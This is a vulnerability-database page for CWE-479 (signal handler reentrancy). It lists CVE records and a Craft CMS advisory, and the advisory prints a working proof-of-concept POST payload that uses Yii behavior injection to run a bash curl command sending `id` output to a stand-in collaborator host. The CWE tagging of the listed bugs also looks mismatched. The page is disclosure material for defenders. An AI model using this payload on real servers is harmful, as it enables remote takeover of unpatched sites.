CWE-479
AllowedSignal Handler Use of a Non-reentrant Function
Abstraction: Variant · Status: Draft
The product defines a signal handler that calls a non-reentrant function.
3 vulnerabilities reference this CWE, most recent first.
CVE-2026-44011 (GCVE-0-2026-44011)
Vulnerability from cvelistv5 – Published: 2026-05-12 20:25 – Updated: 2026-05-13 15:37- CWE-479 - Signal Handler Use of a Non-reentrant Function
| URL | Tags |
|---|---|
| https://github.com/craftcms/cms/security/advisori… | x_refsource_CONFIRM |
| https://github.com/craftcms/cms/commit/ab85ca7f5f… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-44011",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-13T15:01:05.700590Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-13T15:37:25.178Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/craftcms/cms/security/advisories/GHSA-qrgm-p9w5-rrfw"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "cms",
"vendor": "craftcms",
"versions": [
{
"status": "affected",
"version": "\u003e= 4.0.0, \u003c 4.17.12"
},
{
"status": "affected",
"version": "\u003e= 5.0.0, \u003c 5.9.18"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Craft CMS is a content management system (CMS). From 4.0.0 to before 4.17.12 and 5.9.18, Craft CMS which contains an input-handling flaw in a Yii object creation path that let any authenticated user inject malicious configuration and execute arbitrary commands on the server. The request-controlled condition field layouts data is converted into a live FieldLayout object without a Component::cleanseConfig() boundary. Because Craft configures models before parent::__construct(), attacker-controlled special config keys can take effect during object creation, and FieldLayout initialization then triggers a same-request event. This vulnerability is fixed in 4.17.12 and 5.9.18."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 8.6,
"baseSeverity": "HIGH",
"privilegesRequired": "HIGH",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-479",
"description": "CWE-479: Signal Handler Use of a Non-reentrant Function",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-12T20:25:08.183Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/craftcms/cms/security/advisories/GHSA-qrgm-p9w5-rrfw",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/craftcms/cms/security/advisories/GHSA-qrgm-p9w5-rrfw"
},
{
"name": "https://github.com/craftcms/cms/commit/ab85ca7f5f926994f723f60584054a1f4c4c5de3",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/craftcms/cms/commit/ab85ca7f5f926994f723f60584054a1f4c4c5de3"
}
],
"source": {
"advisory": "GHSA-qrgm-p9w5-rrfw",
"discovery": "UNKNOWN"
},
"title": "Craft CMS: Potential authenticated Remote Code Execution via malicious attached Behavior"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-44011",
"datePublished": "2026-05-12T20:25:08.183Z",
"dateReserved": "2026-05-04T21:24:36.505Z",
"dateUpdated": "2026-05-13T15:37:25.178Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2021-26948 (GCVE-0-2021-26948)
Vulnerability from cvelistv5 – Published: 2022-03-03 00:00 – Updated: 2024-08-03 20:33- CWE-479 - >CWE-476
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T20:33:41.561Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://github.com/michaelrsweet/htmldoc/issues/410"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "htmldoc",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "v1.9.11"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Null pointer dereference in the htmldoc v1.9.11 and before may allow attackers to execute arbitrary code and cause a denial of service via a crafted html file."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-479",
"description": "CWE-479-\u003eCWE-476",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-10-07T00:00:00.000Z",
"orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"shortName": "redhat"
},
"references": [
{
"url": "https://github.com/michaelrsweet/htmldoc/issues/410"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"assignerShortName": "redhat",
"cveId": "CVE-2021-26948",
"datePublished": "2022-03-03T00:00:00.000Z",
"dateReserved": "2021-04-06T00:00:00.000Z",
"dateUpdated": "2024-08-03T20:33:41.561Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
GHSA-QRGM-P9W5-RRFW
Vulnerability from github – Published: 2026-05-06 17:54 – Updated: 2026-05-13 16:29We identified a vulnerability in the latest version of Craft CMS which contains an input-handling flaw in a Yii object creation path that let any authenticated user inject malicious configuration and execute arbitrary commands on the server. Yii’s dynamic object configuration, as implemented in Craft CMS, is a feature that lets the application build parts of itself from a settings list.
This is largely a continuation of https://github.com/craftcms/cms/security/advisories/GHSA-255j-qw47-wjh5, but through a different path that was not mitigated in the original.
The request-controlled condition field layouts data is converted into a live FieldLayout object without a Component::cleanseConfig() boundary. Because Craft configures models before parent::__construct(), attacker-controlled special config keys can take effect during object creation, and FieldLayout initialization then triggers a same-request event.
This appears to be another variant of the recent object-config / behavior-injection bug family, but via the condition / field layout hydration path.
We were able to reproduce the attack by issuing a POST request to /admin/actions/element-search/search with the following JSON from any connected user. Other routes can be exploited in the same way, including the rest of the element-indexes actions that pass through that same beforeAction() path. This results in a curl request to the chosen server with the result of the command “id” for the web user being appended to the path:
``` POST /admin/actions/element-search/search HTTP/2 Host: hostnamehere Cookie: CraftSessionId=...; 1234123412341234_identity=...; CRAFT_CSRF_TOKEN=...; Content-Length: … User-Agent: Mozilla/5.0 X-Csrf-Token: ... Accept: application/json Content-Type: application/json
{
"elementType": "craft\elements\Category",
"siteId": 1,
"search": "",
"condition": {
"class": "craft\elements\conditions\ElementCondition",
"elementType": "craft\elements\Category",
"fieldLayouts": [
{
"as rce": {
"__class": "yii\behaviors\AttributeTypecastBehavior",
"__construct()": [
{
"attributeTypes": {
"typecastBeforeSave": [
"Psy\Readline\Hoa\ConsoleProcessus",
"execute"
]
},
"typecastBeforeSave": "/bin/bash -c \"curl [https://yourcollaboratorservergoeshere/id](https://yourcollaboratorservergoeshere/%60id%60/)""
}
]
},
"on *": "self::beforeSave"
}
]
}
}
```
Resources
https://github.com/craftcms/cms/commit/ab85ca7f5f926994f723f60584054a1f4c4c5de3
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "craftcms/cms"
},
"ranges": [
{
"events": [
{
"introduced": "4.0.0"
},
{
"fixed": "4.17.12"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "craftcms/cms"
},
"ranges": [
{
"events": [
{
"introduced": "5.0.0"
},
{
"fixed": "5.9.18"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-44011"
],
"database_specific": {
"cwe_ids": [
"CWE-470",
"CWE-479"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-06T17:54:06Z",
"nvd_published_at": "2026-05-12T21:16:15Z",
"severity": "HIGH"
},
"details": "We identified a vulnerability in the latest version of Craft CMS which contains an input-handling flaw in a Yii object creation path that let any authenticated user inject malicious configuration and execute arbitrary commands on the server. Yii\u2019s dynamic object configuration, as implemented in Craft CMS, is a feature that lets the application build parts of itself from a settings list.\n\nThis is largely a continuation of https://github.com/craftcms/cms/security/advisories/GHSA-255j-qw47-wjh5, but through a different path that was not mitigated in the original.\n\nThe request-controlled condition field layouts data is converted into a live FieldLayout object without a `Component::cleanseConfig()` boundary. Because Craft configures models before `parent::__construct()`, attacker-controlled special config keys can take effect during object creation, and FieldLayout initialization then triggers a same-request event.\n\nThis appears to be another variant of the recent object-config / behavior-injection bug family, but via the condition / field layout hydration path.\n\nWe were able to reproduce the attack by issuing a POST request to `/admin/actions/element-search/search` with the following JSON from any connected user. Other routes can be exploited in the same way, including the rest of the element-indexes actions that pass through that same `beforeAction()` path. This results in a curl request to the chosen server with the result of the command \u201cid\u201d for the web user being appended to the path:\n\n ```\nPOST /admin/actions/element-search/search HTTP/2\nHost: hostnamehere\nCookie: CraftSessionId=...; 1234123412341234_identity=...; CRAFT_CSRF_TOKEN=...;\nContent-Length: \u2026\nUser-Agent: Mozilla/5.0\nX-Csrf-Token: ...\nAccept: application/json\nContent-Type: application/json\n\n{\n\n \"elementType\": \"craft\\\\elements\\\\Category\",\n \"siteId\": 1,\n \"search\": \"\",\n \"condition\": {\n \"class\": \"craft\\\\elements\\\\conditions\\\\ElementCondition\",\n \"elementType\": \"craft\\\\elements\\\\Category\",\n \"fieldLayouts\": [\n {\n \"as rce\": {\n \"__class\": \"yii\\\\behaviors\\\\AttributeTypecastBehavior\",\n \"__construct()\": [\n {\n \"attributeTypes\": {\n \"typecastBeforeSave\": [\n \"Psy\\\\Readline\\\\Hoa\\\\ConsoleProcessus\",\n \"execute\"\n ]\n },\n \"typecastBeforeSave\": \"/bin/bash -c \\\"curl [https://yourcollaboratorservergoeshere/`id`\\](https://yourcollaboratorservergoeshere/%60id%60/)\"\"\n }\n ]\n },\n \"on *\": \"self::beforeSave\"\n }\n ]\n }\n}\n```\n\n## Resources\n\nhttps://github.com/craftcms/cms/commit/ab85ca7f5f926994f723f60584054a1f4c4c5de3",
"id": "GHSA-qrgm-p9w5-rrfw",
"modified": "2026-05-13T16:29:16Z",
"published": "2026-05-06T17:54:06Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/craftcms/cms/security/advisories/GHSA-255j-qw47-wjh5"
},
{
"type": "WEB",
"url": "https://github.com/craftcms/cms/security/advisories/GHSA-qrgm-p9w5-rrfw"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44011"
},
{
"type": "WEB",
"url": "https://github.com/craftcms/cms/commit/ab85ca7f5f926994f723f60584054a1f4c4c5de3"
},
{
"type": "PACKAGE",
"url": "https://github.com/craftcms/cms"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Craft CMS has Potential Authenticated Remote Code Execution via Malicious Attached Behavior"
}
Mitigation
Require languages or libraries that provide reentrant functionality, or otherwise make it easier to avoid this weakness.
Mitigation
Design signal handlers to only set flags rather than perform complex functionality.
Mitigation
Ensure that non-reentrant functions are not found in signal handlers.
Mitigation
Use sanity checks to reduce the timing window for exploitation of race conditions. This is only a partial solution, since many attacks might fail, but other attacks still might work within the narrower window, even accidentally.
No CAPEC attack patterns related to this CWE.